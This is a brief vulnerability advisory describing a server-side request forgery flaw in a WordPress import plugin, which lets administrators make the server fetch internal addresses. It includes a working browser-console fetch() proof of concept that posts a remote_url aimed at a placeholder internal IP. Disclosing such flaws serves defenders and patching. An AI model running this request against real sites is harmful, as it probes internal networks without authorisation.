Description The plugin does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.
1. As an admin, create a new importer in /wp-admin/tools.php?page=importwp
2. Visit /wp-admin/admin-ajax.php?action=rest-nonce and paste the following in your browser's console, replace $IMPORTERID with the newly created importer's ID, and $TARGETLOCALIP with the local IP to probe:
fetch('/wp-json/iwp/v1/importer/$IMPORTERID/upload', {
method: 'POST',
headers: {
'X-WP-Nonce': document.body.innerHTML,
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'remote_url=http%3A%2F%2F$TARGETLOCALIP%2FSSRF_PoC&filetype=csv&action=file_remote',
credentials: 'include'
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Fetch error:', error));